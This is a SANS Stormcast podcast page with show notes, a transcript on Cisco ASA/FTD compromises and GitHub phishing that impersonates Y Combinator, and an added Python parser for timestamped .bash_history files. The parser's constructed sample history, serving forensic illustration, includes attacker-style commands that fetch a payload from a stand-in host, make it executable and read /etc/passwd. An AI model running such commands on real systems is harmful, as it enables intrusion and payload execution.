
SANS Stormcast Monday, September 29th, 2025: Convert Timestamps; Cisco Compromises; GitHub Notification Phishing

If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9632.mp3


Converting Timestamps in .bash_history
Bash can record a timestamp with each command written to .bash_history (set HISTTIMEFORMAT); the value stored in the file is a Unix epoch timestamp on a line of its own. This new tool converts these timestamps into a human-readable format.
https://isc.sans.edu/diary/New%20tool%3A%20convert-ts-bash-history.py/32324
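Worked example, added here and not the ISC's convert-ts-bash-history.py (whose code this page does not include): a small Python parser for a .bash_history written with HISTTIMEFORMAT set. It pairs each "#<epoch>" line with the command that follows, renders the epoch as ISO 8601 (UTC is an assumption; pick the host's zone if that matters), and re-sorts entries chronologically, because bash appends a session's history when that shell exits, so overlapping sessions end up interleaved in the file. The sample history is constructed.

```python
#!/usr/bin/env python3
"""Parse a .bash_history written with HISTTIMEFORMAT set and render the
epoch timestamps as ISO 8601 (UTC).

Added example for this page; it is not the ISC's convert-ts-bash-history.py.
The sample history at the bottom is constructed for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Iterable

# With HISTTIMEFORMAT set (e.g. `export HISTTIMEFORMAT='%s '` in ~/.bashrc),
# bash writes one "#<epoch>" line before every command it saves. A command that
# is itself a shell comment also starts with "#", but bash only treats "#"
# followed by digits alone as a timestamp, so match exactly that.
TS_LINE = re.compile(r"^#(\d+)$")


@dataclass
class HistoryEntry:
    line_no: int          # 1-based line of the command in the file
    epoch: int | None     # None: recorded before timestamps were enabled
    command: str

    @property
    def iso(self) -> str:
        if self.epoch is None:
            return "no-timestamp"
        return datetime.fromtimestamp(self.epoch, tz=timezone.utc).isoformat()


def parse_history(lines: Iterable[str]) -> list[HistoryEntry]:
    """Pair each "#<epoch>" line with the command line that follows it."""
    entries: list[HistoryEntry] = []
    pending: int | None = None
    for n, raw in enumerate(lines, start=1):
        line = raw.rstrip("\n")
        m = TS_LINE.match(line)
        if m:
            pending = int(m.group(1))
            continue
        if line == "":
            continue
        entries.append(HistoryEntry(n, pending, line))
        pending = None
    return entries


def by_time(entries: list[HistoryEntry]) -> list[HistoryEntry]:
    """Chronological order. bash flushes a shell's history when that shell
    exits, so commands from overlapping sessions sit out of order in the file.
    Sort on the epoch, keep file order for ties, untimestamped entries first."""
    return sorted(entries,
                  key=lambda e: (e.epoch is not None, e.epoch or 0, e.line_no))


def render(entries: list[HistoryEntry]) -> list[str]:
    return [f"{e.iso}  {e.command}" for e in entries]


# Constructed sample: two shells whose histories were flushed in the wrong
# order, plus two old commands recorded before HISTTIMEFORMAT was enabled.
SAMPLE = """\
ls -la
cd /tmp
#1758000120
curl -sO http://example.invalid/payload.sh
#1758000185
chmod +x payload.sh
#1758000060
sudo -l
#1758000090
cat /etc/passwd
"""

if __name__ == "__main__":
    for out in render(by_time(parse_history(SAMPLE.splitlines(keepends=True)))):
        print(out)
```

Run it against a real file with `parse_history(open(path))`. The usual caveat applies: the history file can be trimmed, edited or disabled by whoever controlled the account, so treat the timeline as corroborating evidence, not ground truth.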

Cisco ASA/FTD Compromises
Exploitation of the vulnerabilities Cisco patched last week may go back about a year. Cisco and CISA have released advisories with help identifying affected devices.
https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_continued_attacks
https://www.cisa.gov/news-events/directives/ed-25-03-identify-and-mitigate-potential-compromise-cisco-devices

GitHub Notification Phishing
GitHub notifications are used to impersonate YCombinator and trick victims into installing a crypto drainer.
https://www.bleepingcomputer.com/news/security/github-notifications-abused-to-impersonate-y-combinator-for-crypto-theft/

Podcast Transcript

 Hello and welcome to the Monday, September 29th, 2025
 edition of the SANS Internet Storm Center's Stormcast. My
 name is Johannes Ullrich, recording today from
 Jacksonville, Florida. And this episode is brought to you
 by the SANS.edu Graduate Certificate Program in
 Industrial Control System Security. A quick script from
 Jim this weekend for anybody doing forensics, incident
 response, something to convert the Unix timestamps in 
 .bash_history files to a more human-readable ISO format. Adding
 timestamps to .bash_history is obviously useful in incident
 response. If it's not done by your system, all you have to
 do is add a HISTTIMEFORMAT variable to your .bashrc or a
 similar file. And with that, you basically define the
 format. It's often defined as a Unix timestamp. Part of this
 is to make it easy to sort. The file is being written
 whenever a shell exits. So if you have multiple shells
 running around the same time, well, these particular
 commands may not necessarily be in time order as they're
 being saved to the file. And of course, the usual caveats
 about this file being potentially manipulated or
 disabled by an attacker applies. And then we still
 have to talk about the Cisco vulnerability that I mentioned
 last week. The vulnerability that had already been
 exploited. So again, this affects the ASA and firepower
 devices. Note that exploitation of the devices
 likely started about a year ago. So I've seen numbers in
 news articles and sort of mentioned 2 million affected
 devices. Now note that these are potentially vulnerable
 devices, not exploited devices. I think that distinction
 sometimes got lost in some of the articles that I've seen.
 At this point, there's only a very small number of actual
 exploited devices as far as I've seen. And the exploit
 itself is not public yet. And from everything I heard is not
 trivial. So still, you do want to patch, of course. And now
 the race is on to find an exploit and make it public for
 a vulnerability like that. But overall, the chances that you
 were exploited before the actual patch was released
 aren't that super high, unless you know something that
 would make you consider yourself targeted, in particular
 by a Chinese state-sponsored actor. Now we
 have a number of write-ups around this. I want to point
 out CISA's one. CISA also offers its malware next-gen
 portal to detect infected systems. The way this works is
 that you create a core dump on your particular Cisco device.
 And then upload it to CISA for automatic analysis. Now CISA's
 advice, as always, is focusing on the U.S. federal
 government. But typically, of course, their advice is well
 -sourced and well-thought-out. So definitely something that
 you should consider. As far as uploading malware to the
 malware next-gen portal goes, you must be registered with
 the portal. That means login.gov. So this is restricted at
 this point to U.S. citizens. But you do not have to be
 affiliated with the U.S. federal government. You just
 have to basically figure out if that's something that you
 want to do or not. Not all ASA devices have patches
 available. There are some affected ASA devices that are
 end-of-life. And the only option for those is, of
 course, to replace them with newer models. It is critical
 you get patching now before we have any more widespread
 exploitation of this. According to Cisco, affected
 devices have been found with a modified ROM monitor, for short
 often called ROMMON. This is firmware that basically
 runs during boot. And by modifying the ROMMON,
 the malware is able to persist across reboots and also some software
 updates. However, the specific update released by Cisco in
 this case will specifically scan ROMMON and apply a fix
 if it finds it to be modified. A firmware-update.log file is
 left in that case on disk0: if it found something
 odd with ROMMON. And Cisco recommends that if that's the
 case, if you see the firmware-update.log file, you must
 assume the device is compromised. You must change
 passwords, keys, certificates. Remember, we had that issue
 many times before, where devices like this were compromised
 and then even two-factor authentication seeds and such
 were stolen. Not sure the two-factor authentication seed is
 an issue here with these particular Cisco devices. And
 Cisco also requests that any user who runs into an infected
 device does open a ticket with customer support for further
 help and also advice and analysis of what exactly
 happened there. Your device is considered vulnerable if it
 has the VPN web services enabled. So if you don't have
 the VPN web service enabled, then you shouldn't be
 vulnerable. Of course, you may have had it enabled in the
 past or such. That can sometimes be a little bit
 difficult to figure out and distinguish. I'll add links to
 the Cisco advisory as well as to CISA's in the show notes. So
 if you want to read up on some details that either are
 published, take a look at that. And like I said, this is
 something that this week you really have to get a handle on
 whether or not you're vulnerable. Apply the patches
 and then make sure that you haven't already been
 exploited. The target group is not necessarily just the
 government networks. In the past, we have seen some
 private entities like either suppliers or even law firms in
 some cases being hit by malware like this. And talk
 about some more targeted attacks. The next attack is
 also a bit targeted. And this is the use of GitHub
 notifications that are being abused. On GitHub, if a
 user is mentioned in an issue, GitHub notifies the user of
 the issue via email. Sadly, these notifications are
 customizable enough to make it difficult to distinguish these
 fraud notifications from other email. Bleeping Computer is
 reporting that the latest wave of these attacks was used to
 impersonate the startup accelerator YCombinator. And
 the target here apparently were crypto coin related
 companies. And the lure consists of an email notifying
 the victim of being accepted for funding from YCombinator.
 I think they offered something like $15 million. That, of
 course, entices most startup founders and such to click on
 those emails. And in this case, the email then led to
 a YCombinator lookalike website that then made them
 install some malware that drained their cryptocurrency
 accounts. This is something that's always a little bit
 hard to sort of put into an awareness presentation, given
 that you have a bit more of a targeted attack like
 this, where they're using systems like GitHub that many
 of these founders and people associated with startups are
 more or less trusting. And then, of course, YCombinator
 being something that many of them have probably applied for
 funding for. Well, and that's it for today. So thanks for
 listening and thanks for recommending, for liking this
 podcast. Also, thanks for anybody who is leaving a good
 comment. That's it for today and talk to you again
 tomorrow. Bye.